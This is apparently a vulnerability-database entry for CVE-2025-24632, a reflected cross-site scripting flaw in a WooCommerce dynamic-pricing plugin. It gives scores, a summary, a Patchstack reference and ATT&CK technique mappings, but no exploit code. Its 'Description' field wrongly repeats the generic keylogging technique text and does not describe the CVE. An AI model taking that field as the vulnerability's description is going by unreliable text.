CVE-2025-24632

High

Published: 31 January 2025

Published

31 January 2025

Modified

23 April 2026

KEV Added

—

Patch

—

CVSS Score 7.1 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

EPSS Score 0.0015 35.2th percentile

Risk Priority 14 60% EPSS · 20% KEV · 20% CVSS

Description

Adversaries may log user keystrokes to intercept credentials as the user types them.

Security Summary

CVE-2025-24632 is an Improper Neutralization of Input During Web Page Generation vulnerability, enabling Reflected Cross-site Scripting (XSS) as classified under CWE-79. It affects the Advanced Dynamic Pricing for WooCommerce WordPress plugin by algol.plus, with the issue present in all versions up to and including 4.9.0. The vulnerability carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L), indicating high severity due to its network accessibility and scope change.

Attackers can exploit this vulnerability remotely over the network with low complexity and no authentication privileges required, though it demands user interaction such as visiting a maliciously crafted link or page. Exploitation allows injection of malicious scripts into reflected content on the site, potentially enabling theft of user session cookies, keystroke logging, or other client-side attacks within the victim's browser context, with low but cross-scope impacts to confidentiality, integrity, and availability.

The Patchstack advisory (https://patchstack.com/database/Wordpress/Plugin/advanced-dynamic-pricing-for-woocommerce/vulnerability/wordpress-advanced-dynamic-pricing-for-woocommerce-plugin-4-9-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve) documents the Reflected XSS issue in Advanced Dynamic Pricing for WooCommerce version 4.9.0 and provides vulnerability details for WordPress site administrators.

Details

CWE(s): CWE-79

MITRE ATT&CK Enterprise Techniques

T1659 Content Injection Initial Access

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic.

attack.mitre.org →

T1185 Browser Session Hijacking Collection

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.

attack.mitre.org →

T1539 Steal Web Session Cookie Credential Access

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.

attack.mitre.org →

T1056.001 Keylogging Collection

Adversaries may log user keystrokes to intercept credentials as the user types them.

attack.mitre.org →

Why these techniques?

Reflected XSS directly enables content injection (T1659) via malicious script execution in browser; facilitates session hijacking (T1185) by stealing web session cookies (T1539) and keylogging (T1056.001) as described in the CVE impacts.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

References

https://patchstack.com/database/Wordpress/Plugin/advanced-dynamic-pricing-for-woocommerce/vulnerability/wordpress-advanced-dynamic-pricing-for-woocommerce-plugin-4-9-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
audit@patchstack.com